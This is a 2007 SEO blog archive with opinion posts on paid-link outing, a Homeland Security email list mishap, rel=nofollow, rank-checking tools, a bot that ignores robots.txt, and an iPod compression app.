
SEO Means Squabbling Endlessly Online

The S in SEO stands for Squabbling because that's all they ever do, all day every day, Endlessly and Online.

What do they squabble about?

The usual crap, same thing they've been squabbling about for years about hat colors, search engine spamming and on and on ad nausea.

This week they're raking Rand over the coals because he outed a site selling paid links calling it "unprofessional". Sadly, Rand caved to peer pressure and removed the link to the outed site so he lost a little respect here because if you have an opinion and say something you feel righteous about, stick to your guns and stand behind it.

Besides, can anyone believe the same man that obviously flaunts fashion faux pas with the brightest yellow shoes just so you can see him a mile away at a search conference would give a rats ass about someone's opinion about outing a site?

I'm stunned.

The thing that stuns me even more is that the SEO community obviously wants these sites hidden from view because many of them use those paid links to game the search engines.

Think about this, you wouldn't want your favorite paid link juice site publicly outed would you?

Might cramp your style and you would have to do SEO the old fashioned way with a compelling site and content people naturally link to instead of gaming the system.

What did Rand really do wrong except expose a site violating Google's guidelines?

I think people were worried it would start an avalanche of outing paid link sites and they would quickly become a thing of the past.

Assuming Rand doesn't use those types of sites and doesn't live in a SEO glass house, I would stick to my guns because it's an educational thing for the novices out there to see and avoid, a public service actually, with a real live example of what Google's guidelines tell you not to do.

Doesn't matter what I think, Rand already caved, let the squabbling continue.

Department of Homeland Spam

A couple of days ago the DHS (Dept. of Homeland Security) turned out to be ironically running an insecure listserv to send email that resulted not only in a mini-DDoS of all it's list subscribers but culminated with a complete breach of all the email addresses on that list when they tried to fix it.

Flip wrote a hysterical play-by-play account of the DHS spam which is worth reading to the bitter end because it just gets worse and worse.

Makes me a little concerned about who's securing the Homeland Security!

Then I found a quote from one of the email's in his blog post that fingers the company responsible:

Please note that NICC is aware of the situation and has notified Computer Science Corp to disable the open server...

Also turns out not that it's not even a simple list server:

...Lotus Domino Release 7.0.2FP1 server hosted by a government contractor that reflects email to a list of thousands of subscribers

Can you imagine if this weakness was exposed during an actual crisis and people didn't get the information they needed in a timely manner?

I feel more secure now, don't you?

Wednesday, October 03, 2007

Debunking the FUD around "rel=nofollow"

I finally decided to put my thoughts in black and white and let people know why I think the Emperor G has no clothes which is why they invented "rel=nofollow" in the first place.

Think about how much we hear about relevance.

Relevant results are all the buzz in the relevance of Google's search results and targeting of AdSense ads so they must be the experts in relevance, right?

OK, if they have such a good lock on relevance then why couldn't Google simply determine that spam links from comments on blogs, forums and wikis had NO relevance to the topic of the post and simply discount those links automatically.

Once you grasp the implications of my last paragraph you'll realize that "rel=nofollow" is bogus.

If you're still not sure, think about this for just a moment with a simple scenario where Grandma posts on her crochet blog about a new crochet pattern and then a spammer spams her blog about Viagra or a bunch of other pharma and off topic crap.

Would we be led to believe that the world's greatest search engine with the best search relevance bar none can't tell that the link and comments about Viagra don't match the content of the blog post and can't automatically discount those links without a "rel=nofollow"?

Apparently not, and here comes "rel=nofollow" and all the FUD and fear mongering about who you link to, who you can sell links or legitimate ads to, and whether or not you can pass link juice or not without the risk being penalized if you don't bend to the will of the same company that ironically makes their billions selling paid links.

Does anyone besides me smell a hand job penalty for paid links?

If Google can't tell that the Viagra ad was off topic on Granny's Crochet blog then how are they detecting paid links?

With all that said I think "rel=nofollow" at a minimum is a good idea just to automatically discount random links from random people posting on blogs, forums and wikis just to take the possible SEO reward out spam. However, that won't stop the spam because the same stupid people that open those emails and go to those websites will still click the links in the spam posts as well so the direct traffic will still be a big enough incentive to continue spamming websites. The only upside is it thwarts their efforts to gain rank in the search engines.

However, if Google's relevance detection, especially with off topic links was really that good, the spam posts never would've been a problem in the first place.

Does anyone smell a rat?

Unfortunately the rat I smell is mixed content sites such as many news sites, forums and blogs with random topics per page that probably caused too many false positives for an algorithm to automatically discard what would appear to be off topic links.

Therefore, the algorithm probably failed and here we are scared into policing ourselves with "rel=nofollow" and every now and then someone caught selling a paid link or something is thrown on the sacrificial altar just to stir some high profile FUD and keep everyone in line.

That's my theory, what do you think?

Page Position Checking SEO Tools Waste Time and Money

The SEO community is always promoting page position checking tools all over the place but those tools are hardly useful and just part of the harmful hype that constantly surrounds the SEO business. Worse yet, they burn up your money paying for crap that most ultimately discard, waste time initializing the software per site, burn more time and bandwidth running them, and worse yet, these tools are against the Google Webmaster Guidelines. Since most SEO's don't give a rat's ass about doing things that are against the Google Webmaster Guidelines, until their sites get penalized in Google, we'll focus on why it's a waste of time and money.

Why would you possibly need a page rank checker?

Customer wants a position report.
Keeping an eye on the competition's ranking.
Don't know how to interpret traffic analytics.
Because everyone else does it.

Customer wants a page position report

There must be a motivating factor driving all of this rank checking mania, we'll call it money, because it certainly isn't common sense. I've never hired outside SEO but I'll bet customers get charged extra for these silly reports to cover the costs of the software or service they pay to create those reports.

The customer probably didn't know he needed a position report until some SEO claimed "Top 10 position guaranteed!" or something equally as silly which put that thought in his head in the first place. Now that the customer has that idea about a single position you need to either educate them about why it's garbage or spend time and money pounding the search engines running reports that put your money where your mouth is.

I would probably opt to educate the customer about what really matters and show increases in traffic and conversions and skip right past the silly rank checking. If you want to spend money wisely and help the customer spend it wisely as well invest in really good analytics and skip directly past page rank checking.

Unfortunately, we all know some customers will be fixated on ranking #1 for some term and won't see or appreciate the big picture in overall traffic improvements and will have a single-minded focus on that single keyword. Those are customers I would walk away from because anything short of achieving that goal and they'll never be happy and misery flows downhill. Run, do not walk, away from this situation.

Keeping an eye on the competition's ranking.

Considering that the bulk of the traffic usually comes from less than 30 keyword phrases (ok, I just picked 30 as a random number for discussion, your mileage may vary) it's pretty easy to eyeball these phrases in the search engines every now and then just to get an idea what the competitive landscape looks like. Spending tons of money on software just to track this competitive analysis is also silly because you know for a fact that when you improve your traffic and conversions on certain terms you're taking them away from someone. Likewise, if you lose traffic and conversions on certain terms you can typically assume someone is taking that traffic away from you and you can easily eyeball that term in the search engine to see where it went.

Don't know how to interpret traffic analytics.

Anyone that has ever run a web site for any length of time will realize that everything you'll ever need to know can be found in your log file analysis. If you rank well for a keyword or phrase you'll be getting a lot of traffic on that term and if you don't rank well, or at all, you won't get traffic for that term. Pretty simple to figure out what terms rank because everything that doesn't show up in your log files either doesn't rank or if it did rank, doesn't drive traffic because people don't search for that phrase so it's meaningless.

Learning how to properly understand the traffic to your site can seem a little overwhelming at first because not all traffic is good traffic. The easiest way to really understand where to focus your energy is tracking conversions to see which terms bring in the most customers that convert and then expand your search engine marketing around what I like to call "the phrase that pays".

Usually it's a lot of phrases but that's a different discussion for a different day.

I always recommend a combination of server side and service provider analysis tools as you need something that can analyze your raw server log files and it never hurts to use something free, especially if you're on a budget or not terribly technical, like Google Analytics as it's easy to install. Additionally, consider looking into some of the information provided by Google Webmaster Tools.

The main difference between a javascript-based analytics tool like Google Analytics and server side stats is that the javascript-based tools tend to only show real humans surfing the web. All the 'bots that crawl don't tend to be javascript capable which is why the two tools will show a huge discrepancy between your raw server logs and analytics services. Don't forget that many surfers disable javascript and run various ad blocking software which may also block your analytics tracker for privacy reasons. Therefore, the truth about your traffic lies somewhere in the middle of the raw server logs and a hosted analytics service but you usually can't go wrong basing decisions on the results of an analytics service.

Because everyone else does it.

That's not even a reason, that's an excuse.

This article wouldn't be complete if I didn't admit once upon a time, a long time ago, even I fell for the page position tracking trap and did it for almost 6 months before I realized I was wasting my time. Worrying about minor fluctuations are silly because the search engines are constantly in flux and your site may go up or down a little on various terms all the time, it's natural. However, if your site moves up or down a substantial amount on a term, your analytics will point this out just as well as the rank checker so it's completely redundant and doing the same job twice is obviously a waste of time and money.

That's why I abandoned checking my page positions years ago, increased my traffic more than I ever did looking at those silly reports, and both made and saved a lot of money in the process.

Summary

Skip the rank position checking except for manually eyeballing the search results every now and then for some top terms and invest heavily in analytics.

You'll be happier, you'll be focused on what really gets better results and you won't feel like a schmuck.

Wednesday, September 26, 2007

Cyberspider Crap-of-the-Day Bot Award

No clue what this spider does as it only asked for my home page but I know what it doesn't do, it doesn't ask for robots.txt.

Here's the 411 on this bad bot:

81.56.161.126 [veigy.globalitsolution.com.] requested 1 pages as "cyberspider"

These crappy crawlers just keep coming...

Double iPod Storage with iDoubler from Analog Magic

Found out an old friend of mine who's a real smart guy wrote some cool software to compress music files on an iPod. This iPod software tool of his called iDoubler uses some real high tech audio analysis processing to reduce the size of MP3 files and others in half, without compromising quality, thus doubling the amount of storage on your iPod or other music players.

Most of the music stored on my Zen is in MP3 format so even if I didn't put twice as many songs on the Zen, using iDoubler would cut the upload time in half.

Anyway, I just thought that it would be worth mentioning iDoubler for the rest of you out there that may, like me, still have a music player with 5GB or less so we can jam yet more into our old trusty music players until prices and sizes drop on those fancy 30GB devices.